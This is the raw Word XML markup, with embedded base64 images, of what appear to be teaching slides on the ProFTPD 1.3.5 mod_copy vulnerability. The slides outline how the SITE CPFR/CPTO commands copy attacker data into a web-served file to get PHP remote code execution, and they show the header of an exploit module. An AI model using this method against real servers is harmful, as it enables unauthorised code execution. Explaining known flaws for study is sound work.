ouK8vxgF7wMO65f4td+eT5vr9yH5+NrGpNTjw7hegvA0+r9juOEHdMgD09FeWDvR&#10;KAiP+F+9ZfPpLPijgvk0SUDmmfyPn/8A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QItABQABgAIAAAA&#10;IQDa9j37DQEAABQCAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAAPgEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAMu2ZJcYAwAAcwoAAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0ACgAAAAAAAAAhAGM672l30AAAd9AAABQAAAAAAAAAAAAAAAAAgQUAAGRycy9tZWRpYS9pbWFn&#10;ZTEuanBnUEsBAi0AFAAGAAgAAAAhAKXEPTPdAAAABgEAAA8AAAAAAAAAAAAAAAAAKtYAAGRycy9k&#10;b3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAADTXAABk&#10;cnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAACXYAAAAAA==&#10;">
                <v:shape id="Picture 340765" o:spid="_x0000_s1044" type="#_x0000_t75" style="position:absolute;top:762;width:110871;height:46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wJaxgAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heYI3uzHaWmK3RQoFT5ZEwetr9pldzb5Ns2ua/vtuodDjMDPfMIvV6FoxUB+sZwWPkwwE&#10;ce215UbB1+fmYQ4iRGSNrWdScKQAq+XtzQIL7Q9c0lDFRiQIhwIVmBi7QspQG3IYJr4jTt6P7x3G&#10;JPtG6h4PCe5amWfZTDq0nBYMdrQ2VP9V/07BusutqXZD+fG9NZbyEgP/7pW6vxvfXkFEGuM1fGm/&#10;awVPz9nLbArnP+kLyOUJAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAmPMCWsYAAADfAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId80" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 109709" o:spid="_x0000_s1045" style="position:absolute;left:7905;width:8488;height:3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gZgwwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P/B/CE7zNxB2crUYRp+hxU0G9PZpnW2xeShNt3V+/DAY7fny/Z4vOVuJBjS8daxgNFQjizJmS&#10;cw3Hw+Z1AsIHZIOVY9LwJA+Lee9lhqlxLX/RYx9yEUPYp6ihCKFOpfRZQRb90NXEkbu6xmKIsMml&#10;abCN4baSb0qNpcWSY0OBNa0Kym77u9WwndTL8859t3m1vmxPn6fk45AErQf9bjkFEagL/+I/987E&#10;+Sp5Vwn8/okA5PwHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEASTIGYMMAAADfAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2D067C64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="54"/>
                          </w:rPr>
                          <w:t xml:space="preserve">And </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 109710" o:spid="_x0000_s1046" style="position:absolute;left:14287;width:19256;height:3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TkgxAAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NT8JA&#10;EL2b+B82Y8JNtnBAWlkIEQgcpZigt0l3bBu7s013ocVf7xxIPL6878VqcI26UhdqzwYm4wQUceFt&#10;zaWBj9PueQ4qRGSLjWcycKMAq+XjwwIz63s+0jWPpZIQDhkaqGJsM61DUZHDMPYtsXDfvnMYBXal&#10;th32Eu4aPU2SmXZYszRU2NJbRcVPfnEG9vN2/Xnwv33ZbL/25/dzujml0ZjR07B+BRVpiP/iu/tg&#10;ZX6SvkzkgfwRAHr5BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF3ROSDEAAAA3wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="39F40732" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t xml:space="preserve">eventually </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 109711" o:spid="_x0000_s1047" style="position:absolute;left:28765;width:7981;height:3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Zy7xQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X+h+WKfRWN/FQTcxGpLbo0ZqCehuyYxKanQ3ZrUn99W5B6PHxvrPlaFpxod41lhXEkwgEcWl1&#10;w5WCr+LjZQ7CeWSNrWVS8EsOlvnjQ4aptgN/0mXvKxFC2KWooPa+S6V0ZU0G3cR2xIE7296gD7Cv&#10;pO5xCOGmldMoepUGGw4NNXb0VlP5vf8xCjbzbnXc2utQte+nzWF3SNZF4pV6fhpXCxCeRv8vvru3&#10;OsyPklkcw9+fAEDmNwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAynZy7xQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="581A7C7C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t>fails!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ECDA8EA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="10" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The gist of the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D5DC39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="111" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The mod_ copy plugin for this version of ProFTPd allows commands site cpfr and site cpto, which can be used to copy files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E278F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="226" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>It is possible to copy data from our input (/proc/se1f/fd/3 as attempted) to a file that can be accessed on the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F08346" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="965" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Because there is a web server with PHP running, and we can supply arbitrary PHP, we can achieve Remote Code Execution!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8FB9A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15228" w:right="-1305"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B48234" wp14:editId="1EF3FD74">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116728" name="Picture 116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8" name="Picture 11672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47B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So why didn't </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>that exploit script work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A113297" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>We can connect to the service manually and try to run those commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE8F0B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="656"/>
        <w:ind w:left="-84" w:right="-435"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114F0896" wp14:editId="200913DF">
            <wp:extent cx="10534650" cy="2019300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340766" name="Picture 3407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66" name="Picture 340766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05346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57B6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="311" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>During testing, we receive a Permission denied error!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBBC3C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Could this exploit be done in any other way?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="174C2064" wp14:editId="5E834FA7">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123403" name="Picture 123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3" name="Picture 12340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-105" w:tblpY="1980"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16633" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="488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7485"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="39F91CCC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="6249"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16633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4870F87A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="109"/>
              <w:ind w:left="351"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="52"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>def initialize(info =</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F94061" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="37"/>
              <w:ind w:left="891"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>super (update_i nfo(info,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65279DD5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1746"/>
                <w:tab w:val="center" w:pos="8398"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:tab/>
              <w:t>'Name '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:tab/>
              <w:t>'ProFTPD 1.3.5 Mod_Copy Command Execution'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDED0FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1296"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>'Description '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E04673A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-204" w:right="-848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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E93A3C4" wp14:editId="30FE77D6">
                      <wp:extent cx="11229975" cy="2667000"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="334898" name="Group 3348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229975" cy="2667000"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="11229975" cy="26670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40768" name="Picture 340768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90500"/>
                                  <a:ext cx="11229975" cy="2476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3596" name="Rectangle 123596"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1352550" y="0"/>
                                  <a:ext cx="707303" cy="27870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F30DD88" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">This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597" name="Rectangle 123597"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1914525" y="19050"/>
                                  <a:ext cx="1011341" cy="24069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979AAAA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="34"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">module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598" name="Rectangle 123598"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="2686050" y="0"/>
                                  <a:ext cx="1302711" cy="27870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C4B9B3A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">exploits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599" name="Rectangle 123599"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3676650" y="0"/>
                                  <a:ext cx="593289" cy="27870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22812DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">the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600" name="Rectangle 123600"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4133850" y="0"/>
                                  <a:ext cx="707303" cy="27870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9ACC2B9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">SITE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601" name="Rectangle 123601"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4686300" y="19050"/>
                                  <a:ext cx="1480067" cy="21536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CA82321" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">CPFR/CPTO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602" name="Rectangle 123602"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="5800725" y="19050"/>
                                  <a:ext cx="1302711" cy="24069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72F07B2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="32"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">commands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603" name="Rectangle 123603"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="6800850" y="0"/>
                                  <a:ext cx="428602" cy="27870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558BA04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="56"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">in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604" name="Rectangle 123604"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="7134225" y="19050"/>
                                  <a:ext cx="1176029" cy="21536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B19B3B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">ProFTPD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605" name="Rectangle 123605"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="8020050" y="0"/>
                                  <a:ext cx="1163361" cy="27870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BB2DBBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">version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3606" name="Rectangle 123606"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="8915400" y="0"/>
                                  <a:ext cx="823436" cy="27870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ECF668D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t>1.3.5.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93A3C4" id="Group 334898" o:spid="_x0000_s1048" style="width:884.25pt;height:210pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="112299,2667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IPhTaLwQAACIZAAAOAAAAZHJzL2Uyb0RvYy54bWzkWd1u2zYUvh+w&#10;dxB030gk9Y84xbCsQYFhDdrtAWiZsoRJokDRsbOn3yFFMY0tt0ou7AtdRCEp6vDw+84f6duPh6Z2&#10;npjoK96uXHTjuw5rc76p2u3K/efvTx8S1+klbTe05i1buc+sdz/e/frL7b7LGOYlrzdMOCCk7bN9&#10;t3JLKbvM8/q8ZA3tb3jHWnhZcNFQCV2x9TaC7kF6U3vY9yNvz8WmEzxnfQ+j98NL907LLwqWyy9F&#10;0TPp1CsXdJP6KfRzrZ7e3S3NtoJ2ZZUbNeg7tGho1cKiVtQ9ldTZiepEVFPlgve8kDc5bzxeFFXO&#10;9B5gN8g/2s2D4LtO72Wb7bedhQmgPcLp3WLzv54ehVNtVi4hQZICWy1tgCe9tGPGAKR9t81g7oPo&#10;vnWPwgxsh57a96EQjfoPO3IOGt5nCy87SCeHQYQwTtM4dJ0cXuIoin3fMJCXQNPJh3n5x88+9cal&#10;PaWhVair8gz+DGLQOkHs55YFX8mdYK4R0syS0VDx7677AOR2VFbrqq7kszZUoFEp1T49VvmjGDrf&#10;gR/4cWTBhylqZYcMo4C2+lTNVt9C11P9V6LWddV9qupacaDaRmmw9CNLmdj3YIX3PN81rJWDWwlW&#10;g/687cuq611HZKxZM7AS8XmDBqfppWAyL9WCBSz8FVxNaUYz+0Jr+aKY0rkH4zlrLij1w9EgzthM&#10;EEdmiiWeZp3o5QPjjaMaoCJoAmjTjD792RudxikGukENrR9opawbok8/gga9E9je5GDfStoxUEGJ&#10;feEYYRKm0ehgCi/abmvmmHHtU3q+9bD+HF6IhDgMIZ6dOlnsx8QnxsXiJPaxouu9aNGsbhWULVfG&#10;NQhSI+Bto3KqJQ/rgw4iKFCrqaE13zxDZCm5+O8L5Iei5vuVy03LVSkDqFJvXaf+3ALgKjqPDTE2&#10;1mNDyPp3rmP4oM5vO8mLSrP7sprRC5i8JKXxGUrjEQowgRmUpigAUjWl2hEGL7N+4CNEAmR4Dfwo&#10;1eIvxms4bmY5vNpwfOSqyQjFLF5xlEQQ1qZcFREfx2jk9PK+Go0bWQ6n6RlfTUcoZnFKojiCPDTF&#10;aZgSnMAqusK5PKU25iyF0ggKBlOyvnJTNf6WjBogQpJpSq+cUW24WQ6lEBKHU8gRpbryVOl+lpcG&#10;EHmJMg8okqYyapDA+RGSt3ZVFJJIW8zFMqoNOcvhFZ/hVZeos3kNgbf4B5XSq6x68UoJ27izHF7h&#10;uDHpr+RNITgCXs+E4ABDEQXWc52sim3cWQ6lwRlK7fluVgiO4cyCf+CqKAZax2rp4iEY27izHF7h&#10;gDnpqvZ8N4vXxIe71+lqCaGIkOhqhxpsY85yOJ2+U4p8e76bx2mKwsCUS+ZWdrx8SDAJCKxypfBr&#10;Y861KdV3zHARr+/TzI8G6qb/+76+g3r5aePufwAAAP//AwBQSwMECgAAAAAAAAAhADcdCoiRAQEA&#10;kQEBABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgID&#10;AgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgS&#10;FBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQU/8AAEQgBBASb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